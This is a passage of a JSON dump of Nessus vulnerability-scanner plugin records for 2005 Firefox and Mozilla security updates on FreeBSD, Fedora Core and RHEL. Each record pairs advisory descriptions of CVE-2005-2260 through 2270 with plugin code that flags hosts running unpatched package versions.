value:\"p-cpe:/a:freebsd:freebsd:netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phoenix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:pt_BR-netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-linux-mozillafirebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zhCN-linux-mozillafirebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zhTW-linux-mozillafirebird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"firefox<1.0.5,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-firefox<1.0.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla<1.7.9,2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla>=1.8.*,2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-mozilla<1.7.9\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-mozilla>=1.8.*\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-mozilla-devel<1.7.9\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-mozilla-devel>=1.8.*\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"netscape7>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"de-linux-mozillafirebird>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"el-linux-mozillafirebird>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-linux-mozillafirebird-gtk1>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-mozillafirebird-gtk2>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-mozillafirebird>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-linux-mozillafirebird>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"zhCN-linux-mozillafirebird>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"zhTW-linux-mozillafirebird>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"de-linux-netscape>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"de-netscape7>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"fr-linux-netscape>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"fr-netscape7>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-linux-netscape>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-netscape7>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-netscape>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-phoenix>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla+ipv6>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla-embedded>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla-firebird>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla-gtk1>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla-gtk2>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla-gtk>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla-thunderbird>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"phoenix>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"pt_BR-netscape7>=0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:51", "description": "Mozilla Firefox is an open source Web browser.\n\nA bug was found in the way Firefox handled synthetic events. It is\npossible that Web content could generate events such as keystrokes or\nmouse clicks that could be used to steal data or execute malicious\nJavaScript code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-2260 to this issue.\n\nA bug was found in the way Firefox executed JavaScript in XBL\ncontrols. It is possible for a malicious web page to leverage this\nvulnerability to execute other JavaScript based attacks even when\nJavaScript is disabled. (CVE-2005-2261)\n\nA bug was found in the way Firefox set an image as the desktop\nwallpaper. If a user chooses the 'Set As Wallpaper...' context menu\nitem on a specially crafted image, it is possible for an attacker to\nexecute arbitrary code on a victim's machine. (CVE-2005-2262)\n\nA bug was found in the way Firefox installed its extensions. If a user\ncan be tricked into visiting a malicious web page, it may be possible\nto obtain sensitive information such as cookies or passwords.\n(CVE-2005-2263)\n\nA bug was found in the way Firefox handled the _search target. It is\npossible for a malicious website to inject JavaScript into an already\nopen web page. (CVE-2005-2264)\n\nA bug was found in the way Firefox handled certain JavaScript\nfunctions. It is possible for a malicious web page to crash the\nbrowser by executing malformed JavaScript code. (CVE-2005-2265)\n\nA bug was found in the way Firefox handled multiple frame domains. It\nis possible for a frame as part of a malicious website to inject\ncontent into a frame that belongs to another domain. This issue was\npreviously fixed as CVE-2004-0718 but was accidentally disabled.\n(CVE-2005-1937)\n\nA bug was found in the way Firefox handled child frames. It is\npossible for a malicious framed page to steal sensitive information\nfrom its parent page. (CVE-2005-2266)\n\nA bug was found in the way Firefox opened URLs from media players. If\na media player opens a URL that is JavaScript, JavaScript is executed\nwith access to the currently open web page. (CVE-2005-2267)\n\nA design flaw was found in the way Firefox displayed alerts and\nprompts. Alerts and prompts were given the generic title [JavaScript\nApplication] which prevented a user from knowing which site created\nthem. (CVE-2005-2268)\n\nA bug was found in the way Firefox handled DOM node names. It is\npossible for a malicious site to overwrite a DOM node name, allowing\ncertain privileged chrome actions to execute the malicious JavaScript.\n(CVE-2005-2269)\n\nA bug was found in the way Firefox cloned base objects. It is possible\nfor Web content to navigate up the prototype chain to gain access to\nprivileged chrome objects. (CVE-2005-2270)\n\nUsers of Firefox are advised to upgrade to this updated package that\ncontains Firefox version 1.0.6 and is not vulnerable to these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2005-07-21T00:00:00", "title": "Fedora Core 4 : firefox-1.0.6-1.1.fc4 (2005-605)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2004-0718", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "modified": "2005-07-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:firefox", "cpe:/o:fedoraproject:fedora_core:4", "p-cpe:/a:fedoraproject:fedora:firefox-debuginfo"], "id": "FEDORA_2005-605.NASL", "href": "https://www.tenable.com/plugins/nessus/19262", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-605.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19262);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2005-2260\");\n script_xref(name:\"FEDORA\", value:\"2005-605\");\n\n script_name(english:\"Fedora Core 4 : firefox-1.0.6-1.1.fc4 (2005-605)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox is an open source Web browser.\n\nA bug was found in the way Firefox handled synthetic events. It is\npossible that Web content could generate events such as keystrokes or\nmouse clicks that could be used to steal data or execute malicious\nJavaScript code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-2260 to this issue.\n\nA bug was found in the way Firefox executed JavaScript in XBL\ncontrols. It is possible for a malicious web page to leverage this\nvulnerability to execute other JavaScript based attacks even when\nJavaScript is disabled. (CVE-2005-2261)\n\nA bug was found in the way Firefox set an image as the desktop\nwallpaper. If a user chooses the 'Set As Wallpaper...' context menu\nitem on a specially crafted image, it is possible for an attacker to\nexecute arbitrary code on a victim's machine. (CVE-2005-2262)\n\nA bug was found in the way Firefox installed its extensions. If a user\ncan be tricked into visiting a malicious web page, it may be possible\nto obtain sensitive information such as cookies or passwords.\n(CVE-2005-2263)\n\nA bug was found in the way Firefox handled the _search target. It is\npossible for a malicious website to inject JavaScript into an already\nopen web page. (CVE-2005-2264)\n\nA bug was found in the way Firefox handled certain JavaScript\nfunctions. It is possible for a malicious web page to crash the\nbrowser by executing malformed JavaScript code. (CVE-2005-2265)\n\nA bug was found in the way Firefox handled multiple frame domains. It\nis possible for a frame as part of a malicious website to inject\ncontent into a frame that belongs to another domain. This issue was\npreviously fixed as CVE-2004-0718 but was accidentally disabled.\n(CVE-2005-1937)\n\nA bug was found in the way Firefox handled child frames. It is\npossible for a malicious framed page to steal sensitive information\nfrom its parent page. (CVE-2005-2266)\n\nA bug was found in the way Firefox opened URLs from media players. If\na media player opens a URL that is JavaScript, JavaScript is executed\nwith access to the currently open web page. (CVE-2005-2267)\n\nA design flaw was found in the way Firefox displayed alerts and\nprompts. Alerts and prompts were given the generic title [JavaScript\nApplication] which prevented a user from knowing which site created\nthem. (CVE-2005-2268)\n\nA bug was found in the way Firefox handled DOM node names. It is\npossible for a malicious site to overwrite a DOM node name, allowing\ncertain privileged chrome actions to execute the malicious JavaScript.\n(CVE-2005-2269)\n\nA bug was found in the way Firefox cloned base objects. It is possible\nfor Web content to navigate up the prototype chain to gain access to\nprivileged chrome objects. (CVE-2005-2270)\n\nUsers of Firefox are advised to upgrade to this updated package that\ncontains Firefox version 1.0.6 and is not vulnerable to these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-July/001101.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9e6fb068\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 4.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC4\", reference:\"firefox-1.0.6-1.1.fc4\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"firefox-debuginfo-1.0.6-1.1.fc4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:51", "description": "Mozilla Firefox is an open source Web browser.\n\nA bug was found in the way Firefox handled synthetic events. It is\npossible that Web content could generate events such as keystrokes or\nmouse clicks that could be used to steal data or execute malicious\nJavaScript code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-2260 to this issue.\n\nA bug was found in the way Firefox executed JavaScript in XBL\ncontrols. It is possible for a malicious web page to leverage this\nvulnerability to execute other JavaScript based attacks even when\nJavaScript is disabled. (CVE-2005-2261)\n\nA bug was found in the way Firefox set an image as the desktop\nwallpaper. If a user chooses the 'Set As Wallpaper...' context menu\nitem on a specially crafted image, it is possible for an attacker to\nexecute arbitrary code on a victim's machine. (CVE-2005-2262)\n\nA bug was found in the way Firefox installed its extensions. If a user\ncan be tricked into visiting a malicious web page, it may be possible\nto obtain sensitive information such as cookies or passwords.\n(CVE-2005-2263)\n\nA bug was found in the way Firefox handled the _search target. It is\npossible for a malicious website to inject JavaScript into an already\nopen web page. (CVE-2005-2264)\n\nA bug was found in the way Firefox handled certain JavaScript\nfunctions. It is possible for a malicious web page to crash the\nbrowser by executing malformed JavaScript code. (CVE-2005-2265)\n\nA bug was found in the way Firefox handled multiple frame domains. It\nis possible for a frame as part of a malicious website to inject\ncontent into a frame that belongs to another domain. This issue was\npreviously fixed as CVE-2004-0718 but was accidentally disabled.\n(CVE-2005-1937)\n\nA bug was found in the way Firefox handled child frames. It is\npossible for a malicious framed page to steal sensitive information\nfrom its parent page. (CVE-2005-2266)\n\nA bug was found in the way Firefox opened URLs from media players. If\na media player opens a URL that is JavaScript, JavaScript is executed\nwith access to the currently open web page. (CVE-2005-2267)\n\nA design flaw was found in the way Firefox displayed alerts and\nprompts. Alerts and prompts were given the generic title [JavaScript\nApplication] which prevented a user from knowing which site created\nthem. (CVE-2005-2268)\n\nA bug was found in the way Firefox handled DOM node names. It is\npossible for a malicious site to overwrite a DOM node name, allowing\ncertain privileged chrome actions to execute the malicious JavaScript.\n(CVE-2005-2269)\n\nA bug was found in the way Firefox cloned base objects. It is possible\nfor Web content to navigate up the prototype chain to gain access to\nprivileged chrome objects. (CVE-2005-2270)\n\nUsers of Firefox are advised to upgrade to this updated package that\ncontains Firefox version 1.0.6 and is not vulnerable to these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2005-07-21T00:00:00", "title": "Fedora Core 3 : firefox-1.0.6-1.1.fc3 (2005-603)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2004-0718", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "modified": "2005-07-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:firefox", "cpe:/o:fedoraproject:fedora_core:3", "p-cpe:/a:fedoraproject:fedora:firefox-debuginfo"], "id": "FEDORA_2005-603.NASL", "href": "https://www.tenable.com/plugins/nessus/19260", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-603.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19260);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2005-2260\");\n script_xref(name:\"FEDORA\", value:\"2005-603\");\n\n script_name(english:\"Fedora Core 3 : firefox-1.0.6-1.1.fc3 (2005-603)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox is an open source Web browser.\n\nA bug was found in the way Firefox handled synthetic events. It is\npossible that Web content could generate events such as keystrokes or\nmouse clicks that could be used to steal data or execute malicious\nJavaScript code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-2260 to this issue.\n\nA bug was found in the way Firefox executed JavaScript in XBL\ncontrols. It is possible for a malicious web page to leverage this\nvulnerability to execute other JavaScript based attacks even when\nJavaScript is disabled. (CVE-2005-2261)\n\nA bug was found in the way Firefox set an image as the desktop\nwallpaper. If a user chooses the 'Set As Wallpaper...' context menu\nitem on a specially crafted image, it is possible for an attacker to\nexecute arbitrary code on a victim's machine. (CVE-2005-2262)\n\nA bug was found in the way Firefox installed its extensions. If a user\ncan be tricked into visiting a malicious web page, it may be possible\nto obtain sensitive information such as cookies or passwords.\n(CVE-2005-2263)\n\nA bug was found in the way Firefox handled the _search target. It is\npossible for a malicious website to inject JavaScript into an already\nopen web page. (CVE-2005-2264)\n\nA bug was found in the way Firefox handled certain JavaScript\nfunctions. It is possible for a malicious web page to crash the\nbrowser by executing malformed JavaScript code. (CVE-2005-2265)\n\nA bug was found in the way Firefox handled multiple frame domains. It\nis possible for a frame as part of a malicious website to inject\ncontent into a frame that belongs to another domain. This issue was\npreviously fixed as CVE-2004-0718 but was accidentally disabled.\n(CVE-2005-1937)\n\nA bug was found in the way Firefox handled child frames. It is\npossible for a malicious framed page to steal sensitive information\nfrom its parent page. (CVE-2005-2266)\n\nA bug was found in the way Firefox opened URLs from media players. If\na media player opens a URL that is JavaScript, JavaScript is executed\nwith access to the currently open web page. (CVE-2005-2267)\n\nA design flaw was found in the way Firefox displayed alerts and\nprompts. Alerts and prompts were given the generic title [JavaScript\nApplication] which prevented a user from knowing which site created\nthem. (CVE-2005-2268)\n\nA bug was found in the way Firefox handled DOM node names. It is\npossible for a malicious site to overwrite a DOM node name, allowing\ncertain privileged chrome actions to execute the malicious JavaScript.\n(CVE-2005-2269)\n\nA bug was found in the way Firefox cloned base objects. It is possible\nfor Web content to navigate up the prototype chain to gain access to\nprivileged chrome objects. (CVE-2005-2270)\n\nUsers of Firefox are advised to upgrade to this updated package that\ncontains Firefox version 1.0.6 and is not vulnerable to these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-July/001099.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5edf763d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 3.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC3\", reference:\"firefox-1.0.6-1.1.fc3\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"firefox-debuginfo-1.0.6-1.1.fc3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:05:30", "description": "An updated firefox package that fixes various security bugs is now\navailable for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nMozilla Firefox is an open source Web browser.\n\nA bug was found in the way Firefox handled synthetic events. It is\npossible that Web content could generate events such as keystrokes or\nmouse clicks that could be used to steal data or execute malicious\nJavaScript code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-2260 to this issue.\n\nA bug was found in the way Firefox executed JavaScript in XBL\ncontrols. It is possible for a malicious webpage to leverage this\nvulnerability to execute other JavaScript based attacks even when\nJavaScript is disabled. (CVE-2005-2261)\n\nA bug was found in the way Firefox set an image as the desktop\nwallpaper. If a user chooses the 'Set As Wallpaper...' context menu\nitem on a specially crafted image, it is possible for an attacker to\nexecute arbitrary code on a victim's machine. (CVE-2005-2262)\n\nA bug was found in the way Firefox installed its extensions. If a user\ncan be tricked into visiting a malicious webpage, it may be possible\nto obtain sensitive information such as cookies or passwords.\n(CVE-2005-2263)\n\nA bug was found in the way Firefox handled the _search target. It is\npossible for a malicious website to inject JavaScript into an already\nopen webpage. (CVE-2005-2264)\n\nA bug was found in the way Firefox handled certain JavaScript\nfunctions. It is possible for a malicious web page to crash the\nbrowser by executing malformed JavaScript code. (CVE-2005-2265)\n\nA bug was found in the way Firefox handled multiple frame domains. It\nis possible for a frame as part of a malicious website to inject\ncontent into a frame that belongs to another domain. This issue was\npreviously fixed as CVE-2004-0718 but was accidentally disabled.\n(CVE-2005-1937)\n\nA bug was found in the way Firefox handled child frames. It is\npossible for a malicious framed page to steal sensitive information\nfrom its parent page. (CVE-2005-2266)\n\nA bug was found in the way Firefox opened URLs from media players. If\na media player opens a URL that is JavaScript, JavaScript is executed\nwith access to the currently open webpage. (CVE-2005-2267)\n\nA design flaw was found in the way Firefox displayed alerts and\nprompts. Alerts and prompts were given the generic title [JavaScript\nApplication] which prevented a user from knowing which site created\nthem. (CVE-2005-2268)\n\nA bug was found in the way Firefox handled DOM node names. It is\npossible for a malicious site to overwrite a DOM node name, allowing\ncertain privileged chrome actions to execute the malicious JavaScript.\n(CVE-2005-2269)\n\nA bug was found in the way Firefox cloned base objects. It is possible\nfor Web content to navigate up the prototype chain to gain access to\nprivileged chrome objects. (CVE-2005-2270)\n\nUsers of Firefox are advised to upgrade to this updated package that\ncontains Firefox version 1.0.6 and is not vulnerable to these issues.", "edition": 30, "published": "2005-07-21T00:00:00", "title": "RHEL 4 : firefox (RHSA-2005:586)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2004-0718", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2114", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "modified": "2005-07-21T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:firefox"], "id": "REDHAT-RHSA-2005-586.NASL", "href": "https://www.tenable.com/plugins/nessus/19268", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:586. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19268);\n script_version(\"1.32\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0718\", \"CVE-2005-1937\", \"CVE-2005-2114\", \"CVE-2005-2260\", \"CVE-2005-2261\", \"CVE-2005-2262\", \"CVE-2005-2263\", \"CVE-2005-2264\", \"CVE-2005-2265\", \"CVE-2005-2266\", \"CVE-2005-2267\", \"CVE-2005-2268\", \"CVE-2005-2269\", \"CVE-2005-2270\");\n script_xref(name:\"RHSA\", value:\"2005:586\");\n\n script_name(english:\"RHEL 4 : firefox (RHSA-2005:586)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated firefox package that fixes various security bugs is now\navailable for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nMozilla Firefox is an open source Web browser.\n\nA bug was found in the way Firefox handled synthetic events. It is\npossible that Web content could generate events such as keystrokes or\nmouse clicks that could be used to steal data or execute malicious\nJavaScript code. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-2260 to this issue.\n\nA bug was found in the way Firefox executed JavaScript in XBL\ncontrols. It is possible for a malicious webpage to leverage this\nvulnerability to execute other JavaScript based attacks even when\nJavaScript is disabled. (CVE-2005-2261)\n\nA bug was found in the way Firefox set an image as the desktop\nwallpaper. If a user chooses the 'Set As Wallpaper...' context menu\nitem on a specially crafted image, it is possible for an attacker to\nexecute arbitrary code on a victim's machine. (CVE-2005-2262)\n\nA bug was found in the way Firefox installed its extensions. If a user\ncan be tricked into visiting a malicious webpage, it may be possible\nto obtain sensitive information such as cookies or passwords.\n(CVE-2005-2263)\n\nA bug was found in the way Firefox handled the _search target. It is\npossible for a malicious website to inject JavaScript into an already\nopen webpage. (CVE-2005-2264)\n\nA bug was found in the way Firefox handled certain 